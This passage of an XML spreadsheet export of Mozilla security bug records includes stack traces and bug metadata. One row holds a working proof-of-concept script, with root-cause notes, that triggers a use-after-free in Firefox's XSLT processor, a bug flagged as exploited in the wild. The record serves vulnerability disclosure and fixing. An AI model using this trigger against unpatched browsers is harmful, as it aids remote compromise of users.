    #17 0x7fbceeba5ec3 in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsDocShellLoadState*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp
    #18 0x7fbce41f60d1 in nsGlobalWindowOuter::OpenInternal(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsDocShellLoadState*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:7181:21
    #19 0x7fbce41f4839 in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:5694:10
    #20 0x7fbce41f4839 in nsGlobalWindowOuter::OpenOuter(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:5666
    #21 0x7fbce41769d5 in nsGlobalWindowInner::Open(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:3630:3
    #22 0x7fbce6875f88 in mozilla::dom::Window_Binding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2866:44
    #23 0x7fbce780f8d8 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3144:13
    #24 0x7fbceef3cd77 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #25 0x7fbceef3cd77 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #26 0x7fbceef251a6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #27 0x7fbceef251a6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3075
    #28 0x7fbceef07238 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #29 0x7fbceef3d6e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #30 0x7fbceef3f332 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #31 0x7fbcefb50ee9 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2623:10
    #32 0x7fbce6e104a9 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #33 0x7fbce80d6d99 in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #34 0x7fbce80d4029 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205:12
    #35 0x7fbce808652a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1044:22
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:517:7 in nsCOMPtr
Shadow bytes around the buggy address:
  0x0c1880039310: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880039320: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1880039330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1880039340: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880039350: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
=&gt;0x0c1880039360:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1880039370: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1880039380: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1880039390: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c18800393a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c18800393b0: 00 00 00 00 00 00 00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24153==ABORTING</t>
        </is>
      </c>
      <c r="X3660" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3661">
      <c r="A3661" t="n">
        <v>1758062</v>
      </c>
      <c r="B3661" t="inlineStr">
        <is>
          <t>2022-03-03 23:37:36 -0800</t>
        </is>
      </c>
      <c r="C3661" t="inlineStr">
        <is>
          <t>heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]</t>
        </is>
      </c>
      <c r="D3661" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:29 -0700</t>
        </is>
      </c>
      <c r="E3661" t="n">
        <v>1</v>
      </c>
      <c r="F3661" t="n">
        <v>1</v>
      </c>
      <c r="G3661" t="n">
        <v>3</v>
      </c>
      <c r="H3661" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3661" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3661" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K3661" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3661" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3661" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3661" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3661" t="inlineStr">
        <is>
          <t>[adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey]</t>
        </is>
      </c>
      <c r="Q3661" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3661" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3661" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T3661" t="n">
        <v>1</v>
      </c>
      <c r="U3661" t="n">
        <v>0</v>
      </c>
      <c r="V3661" t="n">
        <v>19</v>
      </c>
      <c r="W3661" t="inlineStr">
        <is>
          <t>#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild]
#Type
Render RCE
#NOTE
We have evidence that the following bug is being explot in the wild.
#CREDIT
wang gang&amp;liu jialei&amp;du sihang&amp;huang yi&amp;yang kang of 360 ATA
#MINIPOC
```HTML
&lt;script&gt;			
var v1 = '&lt;?xml version="1.0" encoding="utf-8" ?&gt;&lt;root&gt;&lt;e&gt;&lt;/e&gt;&lt;/root&gt;';
var v2 = '&lt;?xml version="1.0" encoding="utf-8"?&gt;  &lt;xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl"&gt;    &lt;xsl:output method="xml" indent="yes"/&gt; &lt;xsl:param name="test00" /&gt;  &lt;xsl:template match="/"&gt; &lt;xsl:value-of select="$test00" /&gt;  &lt;/xsl:template&gt;    &lt;/xsl:stylesheet&gt;';
var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
a2.transformToDocument(a4);	
&lt;/script&gt;				
```
#RCA
1. Convert get call by transformToDocument
2. Convert use JS::ToString to get str value which cause user js get call
3. in callback attack call removeParameter to free txVariable itself cause uaf
```C++
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {
	JS::Rooted&lt;JS::Value&gt; v(cx, JS::ObjectValue(*jsobj));
	JS::Rooted&lt;JSString*&gt; str(cx, JS::ToString(cx, v));		&lt;&lt;[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);
	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);
	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
```
```
#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=&gt;0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa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5704==ABORTING
```</t>
        </is>
      </c>
      <c r="X3661" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3662">
      <c r="A3662" t="n">
        <v>1510494</v>
      </c>
      <c r="B3662" t="inlineStr">
        <is>
          <t>2018-11-27 17:10:08 -0800</t>
        </is>
      </c>
      <c r="C3662" t="inlineStr">
        <is>
          <t>Write log files and update.status file to restricted directory and copy it to the final location after the update finishes</t>
        </is>
      </c>
      <c r="D3662" t="inlineStr">
        <is>
          <t>2020-06-05 00:28:01 -0700</t>
        </is>
      </c>
      <c r="E3662" t="n">
        <v>1</v>
      </c>
      <c r="F3662" t="n">
        <v>1</v>
      </c>
      <c r="G3662" t="n">
        <v>3</v>
      </c>
      <c r="H3662" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3662" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3662" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3662" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L3662" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3662" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3662" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3662" t="inlineStr">
        <is>
          <t>[fixes bug 1486637/1481907#c19][post-critsmash-triage][adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
      <c r="Q3662" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3662" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3662" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T3662" t="n">
        <v>1</v>
      </c>
      <c r="U3662" t="n">
        <v>0</v>
      </c>
      <c r="V3662" t="n">
        <v>55</v>
      </c>
      <c r="W3662" t="inlineStr">
        <is>
          <t>To lessen the attack surface when writing files in unrestricted locations such as the log file and the update.status file the updater should write these files to a restricted location and then copy them to the final location.
*edit* s/then copy them to the final location/the unelevated updater should copy them to the update directory/</t>
        </is>
      </c>
      <c r="X3662" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3663">
      <c r="A3663" t="n">
        <v>350415</v>
      </c>
      <c r="B3663" t="inlineStr">
        <is>
          <t>2006-08-27 18:48:56 -0700</t>
        </is>
      </c>
      <c r="C3663" t="inlineStr">
        <is>
          <t>new Function("let /*") causes "Assertion failure: let || tt == TOK_VAR" [@ Variables]</t>
        </is>
      </c>
      <c r="D3663" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
